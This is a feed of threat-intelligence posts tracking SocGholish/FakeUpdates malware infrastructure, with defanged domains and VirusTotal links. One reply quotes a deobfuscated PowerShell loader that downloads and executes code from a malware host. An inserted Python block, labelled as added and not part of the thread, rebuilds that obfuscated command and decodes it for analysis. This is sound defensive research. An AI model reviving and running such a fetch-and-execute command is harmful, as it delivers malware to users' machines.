Pinned Tweet
Malware Brandon
48 posts


New SocGholish / FakeUpdates Stage-3 domain of the day:
* snap[.]promantree[.]com
Stage-2 Script that calls it:
virustotal.com/gui/file/868d2…

(4/4)
You can find all of these and ones I've listed in the past on my GitHub: github.com/MalwareBrandon…
#SocGholish

(3/4)
• webdisk[.]housecleaninggrovecityohio[.]com
•• virustotal.com/gui/file/40774…
• support[.]grovecityelectrician[.]com

(1/4) Several new SocGholish Stage-3 domains from the past month or so, with their respective VT Stage-2 script when available:
• webmail[.]drainbusters1[.]com
•• virustotal.com/gui/file/83431…
•• virustotal.com/gui/file/ce566…
• cpanel[.]sbkollel[.]org
•• virustotal.com/gui/file/abcfd…

5/5
A lot of newer compromised sites I'm seeing are skipping the old Stage-2 script and directly calling the Stage-3 domain. #SocGholish #FakeUpdates

1/X
Several new SocGholish infrastructure (Stage-2 / Stage-3) domains added to the list from the past couple of months:
github.com/MalwareBrandon…

- updates[.]highendmark[.]com
- Stage-2 Script Calling this: virustotal.com/gui/file/f5866…
- vps[.]denissalazar[.]com
- Stage-2 Script Calling this: virustotal.com/gui/file/2083c…
- devel[.]asurans[.]com
- virustotal.com/gui/url/afa741…

Some new SocGholish Stage-3 domains observed in the last few days:
- updates[.]highendmark[.]com
- vps[.]denissalazar[.]com
- devel[.]asurans[.]com
Updated my list of infrastructure (Stage2 & Stage3) with some others seen in the past few months as well: github.com/MalwareBrandon…

@SecRiot Looks like the .js executes some slightly obfuscated PowerShell; just some basic string replacement and decimal->char conversion. Deobfuscates to "iex curl -useb hxxp://naybvyzvemm[.]top/f22[.]svg" (defanged)
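To show the two tricks the reply above describes (decimal char codes joined into a string, then a literal string replacement), here is an added Python example that is not part of the original thread. The JS snippet, the regexes and the `deobfuscate` helper are all constructed for this illustration; the sample is not the real script, and it decodes to the same defanged command quoted in the post.

```python
import re

# Constructed sample (hypothetical, not the real .js): decimal character codes
# are joined into a string, then a placeholder is swapped in with one replace()
# call right before the string is handed to PowerShell. Decodes to the defanged
# command quoted in the post, so nothing here is live.
SAMPLE_JS = (
    'var c = "105,101,120,32,99,117,114,108,32,45,117,115,101,98,32,64,64,58,47,47,'
    '110,97,121,98,118,121,122,118,101,109,109,91,46,93,116,111,112,47,102,50,50,'
    '91,46,93,115,118,103".split(",");\n'
    'var s = ""; for (var i = 0; i < c.length; i++) s += String.fromCharCode(c[i]);\n'
    's = s.replace("@@", "hxxp");\n'
    'runPowerShell(s); // hypothetical execution sink'
)

# A quoted, comma-separated run of 1-3 digit decimals is the char-code list.
CODE_LIST = re.compile(r'"((?:\d{1,3},)+\d{1,3})"')
# Literal .replace("old", "new") calls, captured in source order.
REPLACE_CALL = re.compile(r'\.replace\("([^"]*)",\s*"([^"]*)"\)')


def decode_char_codes(js: str) -> str:
    """Rebuild the string the script assembles from its decimal char codes."""
    m = CODE_LIST.search(js)
    if m is None:
        raise ValueError("no decimal char-code list found")
    return "".join(chr(int(n)) for n in m.group(1).split(","))


def apply_replacements(js: str, s: str) -> str:
    """Replay each literal replace() in source order.

    JS String.replace with a string pattern only replaces the first match,
    so count=1 keeps the emulation faithful.
    """
    for old, new in REPLACE_CALL.findall(js):
        s = s.replace(old, new, 1)
    return s


def deobfuscate(js: str) -> str:
    """Static emulation of the decode step: no JS is executed."""
    return apply_replacements(js, decode_char_codes(js))


if __name__ == "__main__":
    print(deobfuscate(SAMPLE_JS))
```

Because the decode is emulated statically, the recovered command can be logged or fed into detection logic without ever running the script.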

@SecRiot Looks like SocGholish. The compromised site reaches out to getmanyme[.]com/privacy/i18min[.]js which is the Stage-2, which reaches out to the Stage-3 at static[.]twalls5280[.]com for some criteria checking and for the payload

Shout out to the following who have recently posted their analysis on #SocGholish and other #FakeUpdates threats in the past few weeks: @TRACLabs_ @RussianPanda9xx @threatinsight @Intel471Inc @GoogleCloudSec
Hope this list helps some people out there with their own analysis.

Finally getting around to sharing the SocGholish infrastructure I've observed over the last year or two. Comprises known initial Stage-2 and Stage-3 domains as well as the respective Stage-2 scripts found on VirusTotal.
github.com/MalwareBrandon…

Malware Brandon retweeted

Mandiant's latest blog post in the "Finding Malware" series dives deep into Fake Browser Update Attacks! 👾 Learn how these attacks use social engineering to deliver malicious payloads like FAKEUPDATES, FAKESMUGGLES, and FAKETREFF.
Read the full post: bit.ly/43hDJ83


@pancak3lullz @x3ph1 There are a few users on here that regularly post SmartapeSG IOCs, but also @MonitorSG on infosec[.]exchange posts frequently about it as well if you want to get some more insight